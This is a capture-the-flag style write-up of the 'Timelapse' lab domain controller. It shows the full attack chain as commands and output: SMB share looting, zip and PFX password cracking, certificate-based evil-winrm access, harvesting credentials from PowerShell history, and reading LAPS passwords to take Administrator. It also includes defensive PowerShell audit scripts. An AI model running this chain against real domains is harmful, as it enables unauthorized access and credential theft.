Starting a Windows Life from Zero: Timelapse

My soul, my tears

My homeland, my everything

How can none of it be explained

If my life were like the sea

My joy, my sorrow

How can I not tell them apart


Target IP: 10.129.227.113

Difficulty: easy to medium

Topics covered:

  • Reconnaissance: port scanning (Nmap), SMB share enumeration, sensitive file discovery (backup/zip).
  • Cracking: zip password cracking (zip2john), PFX certificate password cracking (pfx2john / John the Ripper).
  • Initial Access: WinRM remote connection, SSL certificate authentication (PFX/PKCS#12).
  • Privilege Escalation - Info Leak: PowerShell history analysis (ConsoleHost_history.txt).
  • Privilege Escalation - LAPS Abuse: abusing the LAPS (Local Administrator Password Solution) mechanism by reading the ms-mcs-admpwd attribute of an AD computer object.

Full-port nmap scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-13 19:48 EST
Nmap scan report for 10.129.227.113
Host is up (0.078s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49695/tcp open unknown

Nmap service and script scan of the open ports

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49695 -sV -sC -A -Pn 10.129.227.113

Nmap scan report for 10.129.227.113
Host is up (0.081s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-14 08:52:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2026-01-14T08:54:17+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
| date: 2026-01-14T08:53:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 81.05 ms 10.10.14.1
2 81.01 ms 10.129.227.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds

Many ports are open, in particular 53, 88 and 445, which is the standard footprint of a domain controller. First add the domain name we obtained to /etc/hosts.

Note in particular that 5986 (WinRM over HTTPS) is open while 5985 is closed: if we want to log in over WinRM, we must use an SSL certificate / HTTPS connection.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.227.113 dc01.timelapse.htb timelapse.htb" | tee -a /etc/hosts
10.129.227.113 dc01.timelapse.htb timelapse.htb

SMB service enumeration

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb timelapse.htb
SMB 10.129.227.113 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //timelapse.htb
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

A share named Shares is exposed; let's see whether it can be accessed.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021

6367231 blocks of size 4096. 1247636 blocks available
smb: \>

It is accessible and contains two subdirectories; let's look into each to see what files they hold.

smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021

6367231 blocks of size 4096. 1238285 blocks available
smb: \Dev\> get "winrm_backup.zip"
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \Dev\>
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021

6367231 blocks of size 4096. 1226681 blocks available
smb: \HelpDesk\>

What is Windows LAPS?

Windows Local Administrator Password Solution (Windows LAPS) is a Windows feature that automatically manages and backs up the password of a local administrator account on devices joined to Microsoft Entra or Windows Server Active Directory. You can also use Windows LAPS to automatically manage and back up the Directory Services Restore Mode (DSRM) account password on Windows Server Active Directory domain controllers. An authorized administrator can retrieve and use the DSRM password.

Benefits of using Windows LAPS

Using Windows LAPS to regularly rotate and manage local administrator account passwords provides the following benefits:

  • Protection against pass-the-hash and lateral-traversal attacks
  • Improved security for remote help desk scenarios
  • Ability to sign in to and recover devices that are otherwise inaccessible
  • A fine-grained security model (access control lists and optional password encryption) to protect passwords stored in Windows Server Active Directory
  • Support for the Microsoft Entra role-based access control model to protect passwords stored in Microsoft Entra ID

So we focus on the first item, the winrm backup file, which very likely contains WinRM login credentials.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

It prompts for a password, so we crack it with zip2john and john.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# zip2john winrm_backup.zip > zip.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --wordlist=rockyou.txt zip.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2026-01-13 20:03) 4.347g/s 15101Kp/s 15101Kc/s 15101KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx

The extracted file is a .pfx file.

  1. What is a .pfx file?

PFX (Personal Information Exchange), also known as a PKCS#12 file, is a binary archive format. It typically bundles an SSL/TLS certificate (public key) and its private key in a single encrypted file.

  • Value in a penetration test: it is effectively a "digital key". If you hold this file (and know its password), you can extract the private key and certificate and authenticate as the certificate's owner (here apparently the developer legacyy) without needing that user's plaintext password.

  2. How is it used? (attack path)

The goal is to use this certificate to log in to the target host over WinRM. This usually takes three steps: crack the password -> extract the certificate/private key -> establish the connection.

In the nmap results, the presence of 5986 (WinRM over SSL) and 636 (LDAPS) already hints that this machine relies heavily on certificate authentication or encrypted connections. Plain 5985 (WinRM over HTTP) is not open, so the connection has to go over SSL, which ties in strongly with the PFX certificate found later.

In real engagements, a PFX file usually holds a developer's signing certificate. Being able to log in over WinRM ultimately works because the WinRM service is configured with certificate mapping, which maps that certificate's fingerprint to a specific Windows user, here legacyy.
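From the defender's side, both observations above (an HTTPS-only WinRM listener, and a certificate mapped to a user account) can be verified directly on the host. The following is an added example and not part of the original writeup: it inventories the WinRM listeners, the service-side authentication switches and the client-certificate mappings using only the built-in WSMan: provider. It assumes an elevated PowerShell session on the host itself (for instance DC01); the helper name Get-WSManLeafValues is my own.

```powershell
# Added example, not from the original writeup: inventory WinRM listeners and
# client-certificate mappings on a Windows host. Run in an elevated PowerShell
# session on that host; only the built-in WSMan: provider is used.

# Helper (own name): read every leaf under a WSMan: container into one object.
function Get-WSManLeafValues {
    param([string]$ContainerPath)
    $obj = [ordered]@{}
    foreach ($leaf in Get-ChildItem -Path $ContainerPath) {
        $obj[$leaf.Name] = $leaf.Value
    }
    [pscustomobject]$obj
}

# 1. Listeners. An HTTPS-only configuration (5986 open, 5985 closed in the
#    nmap result) shows up here as a single listener with Transport = HTTPS.
"== WinRM listeners =="
Get-ChildItem -Path WSMan:\localhost\Listener | ForEach-Object {
    Get-WSManLeafValues -ContainerPath "WSMan:\localhost\Listener\$($_.Name)"
} | Select-Object Transport, Port, Address, Hostname, CertificateThumbprint |
    Format-Table -AutoSize

# 2. Service-side authentication switches. Certificate = true is the setting
#    that makes a PFX-based logon (evil-winrm -k/-c) possible at all.
"== Service authentication =="
Get-ChildItem -Path WSMan:\localhost\Service\Auth |
    Select-Object Name, Value | Format-Table -AutoSize

# 3. Client-certificate mappings. Each entry binds a certificate (Subject +
#    Issuer) to an account: whoever holds the matching private key logs on as
#    UserName without that account's password. Every mapping should therefore
#    be a known, still-needed identity whose PFX is not sitting in a backup zip
#    on a share that allows anonymous access.
"== Client certificate mappings =="
Get-ChildItem -Path WSMan:\localhost\ClientCertificate | ForEach-Object {
    Get-WSManLeafValues -ContainerPath "WSMan:\localhost\ClientCertificate\$($_.Name)"
} | Select-Object Subject, Issuer, UserName, Enabled | Format-Table -AutoSize
```

A mapping that is no longer needed can be removed with Remove-Item on the corresponding WSMan:\localhost\ClientCertificate entry; if the certificate file has leaked, as in this writeup, the mapped account's certificate should be revoked and the mapping deleted regardless.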

Extract the hash with pfx2john, then crack it with john.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# pfx2john legacyy_dev_auth.pfx > pfx.john

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --wordlist=rockyou.txt pfx.john
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:59 DONE (2026-01-13 20:08) 0.01678g/s 54242p/s 54242c/s 54242C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After that we can extract the certificate and the private key.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key -nodes
Enter Import Password:
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.crt
Enter Import Password:

Then log in to the target with evil-winrm using the extracted key and certificate.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i timelapse.htb -S -k priv.key -c cert.crt

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

Next, run winpeas.ps1 to enumerate system information. The relevant excerpt of its output:

Possible Password found: IPs
C:\Users\legacyy\AppData\Local\Microsoft\Windows Sidebar\settings.ini
IPs triggered
[Root]
> SettingsVersion=00.00.00.02

Possible Password found: Config Secrets (Passwd / Credentials)
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Config Secrets (Passwd / Credentials) triggered
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) > invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
C:\Users\legacyy\Desktop\user.txt contains the word 'user' -excluding the 'users' directory

The PowerShell history leaks a set of credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
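The same kind of leak can be hunted for proactively instead of waiting for winPEAS to find it. This added example is not from the original writeup: it walks every profile's ConsoleHost_history.txt, matches a few plaintext-credential shapes, including the ConvertTo-SecureString ... -AsPlainText form leaked on this box, and reports file and line with the secret redacted. The function name Find-PlaintextCredentialInHistory and the regex list are my own; it assumes an account that can read the other users' profiles.

```powershell
# Added example, not part of the original writeup: hunt for plaintext secrets in
# PSReadLine history files across all user profiles on a host. Run it from an
# account that can read the other profiles (e.g. a local administrator). Only
# the file, the line number and a redacted copy of the line are reported.

function Find-PlaintextCredentialInHistory {
    param(
        # Per-user PSReadLine history location, as seen on this box.
        [string]$HistoryGlob = 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    )

    # Each pattern captures the secret in a named group so it can be redacted.
    # -match is case-insensitive by default, so no (?i) is needed.
    $patterns = @(
        # ConvertTo-SecureString 'secret' -AsPlainText   (the shape leaked here)
        'ConvertTo-SecureString\s+(?<secret>[''"][^''"]+[''"])\s+-AsPlainText',
        # -Password secret / -p secret style switches (evil-winrm, net use, ...)
        '(?<![\w-])-(?:Password|Passwd|Pass|p)\s+(?<secret>\S+)',
        # connection-string style   Password=secret;
        '\bpassword\s*=\s*(?<secret>[^;\s]+)'
    )

    foreach ($file in Get-ChildItem -Path $HistoryGlob -ErrorAction SilentlyContinue) {
        $lineNo = 0
        foreach ($line in Get-Content -Path $file.FullName -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($pattern in $patterns) {
                if ($line -match $pattern) {
                    [pscustomobject]@{
                        File = $file.FullName
                        Line = $lineNo
                        Text = $line.Replace($Matches['secret'], '<REDACTED>')
                    }
                    break   # one finding per line is enough
                }
            }
        }
    }
}

Find-PlaintextCredentialInHistory | Format-Table -AutoSize -Wrap

# Remediation for interactive sessions: stop PSReadLine from persisting history
# at all (per user, e.g. from $PROFILE). Secrets already written to disk still
# have to be rotated; the svc_deploy password on this box is a case in point.
# Set-PSReadLineOption -HistorySaveStyle SaveNothing
```

Any hit from this script should be treated as a compromised credential, not just a hygiene finding: the history file is readable by the profile owner and by anyone who obtains that user's session, which is exactly the path taken above.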

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i timelapse.htb -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

One of the group memberships stands out:

TIMELAPSE\LAPS_Readers

Judging by the LAPS description above, this group is tied to the feature that automatically manages and backs up the local administrator account password on devices joined to Microsoft Entra or Windows Server Active Directory.

By default, Get-ADComputer does not return extended attributes such as the LAPS password. You must explicitly request 'ms-mcs-admpwd' to read that field; otherwise you will not see it even if you have the permission.

So we simply request it directly.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : W[9W$t862)}{@lz/jOrU51bt
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
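The read above succeeds because svc_deploy is a member of LAPS_Readers. The following is an added example, not from the original writeup, showing the audit a domain administrator would run to list every principal able to read the legacy LAPS attribute on the computers in an OU. It resolves the schema GUID of ms-Mcs-AdmPwd and matches it against the ACEs on the OU, which is how the permission is actually granted; it assumes the RSAT ActiveDirectory module and uses the OU DN from the Get-ADComputer output above. The Find-AdmPwdExtendedRights cmdlet named in the closing comment ships with the LAPS management tools (the AdmPwd.PS module from the LAPS.x64.msi installer seen on the share).

```powershell
# Added example, not from the original writeup: list which principals can read
# the legacy LAPS password attribute (ms-Mcs-AdmPwd) for computers in an OU.
# Requires the RSAT ActiveDirectory module; the OU is taken from the writeup.
Import-Module ActiveDirectory

$ou = 'OU=Domain Controllers,DC=timelapse,DC=htb'

# ms-Mcs-AdmPwd is a confidential attribute. A plain ReadProperty right is not
# enough; the reader needs the CONTROL_ACCESS extended right scoped to this
# attribute, or all extended rights / full control on the object. Resolve the
# attribute's schemaIDGUID so the ACEs can be matched on ObjectType.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$attrSchema = Get-ADObject -SearchBase $schemaNC `
                -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attrSchema) {
    throw 'ms-Mcs-AdmPwd is not in the schema: legacy LAPS is not deployed in this forest.'
}
$admPwdGuid = [guid]::new([byte[]]$attrSchema.schemaIDGUID)

$acl = Get-Acl -Path ("AD:\" + $ou)
$readers = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and (
        # right granted on the attribute itself; this is the ACE that
        # Set-AdmPwdReadPasswordPermission creates for a group such as LAPS_Readers
        ($_.ObjectType -eq $admPwdGuid -and $_.ActiveDirectoryRights -match 'ExtendedRight') -or
        # blanket rights on the whole object: all extended rights or GenericAll
        ($_.ObjectType -eq [guid]::Empty -and $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll')
    )
}

$readers |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited |
    Sort-Object IdentityReference -Unique |
    Format-Table -AutoSize

# With the LAPS management tools installed (AdmPwd.PS module), the same answer
# comes from a single cmdlet:
#   Find-AdmPwdExtendedRights -Identity $ou
```

Every identity this prints can recover the local Administrator password of each computer in the OU, so the list should be as short as the help-desk process genuinely needs, and a service account such as svc_deploy appearing in it (directly or through a group) is a finding in its own right. Write rights on the ACL (WriteDacl, WriteOwner) are a separate audit, since their holders could grant themselves the same access.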
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -u "Administrator" -p 'W[9W$t862)}{@lz/jOrU51bt' -i timelapse.htb -S

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

There is no root.txt on the Administrator's desktop, but there is another user in the domain, and the file can be found on that user's desktop.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir

Directory: C:\Users\TRX\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/14/2026 12:46 AM 34 root.txt

*Evil-WinRM* PS C:\Users\TRX\Desktop>

Author: Skyarrow
Posted on: January 14, 2026
Original URL: http://example.com/2026/01/14/从零开始的windows生活-Timelapse/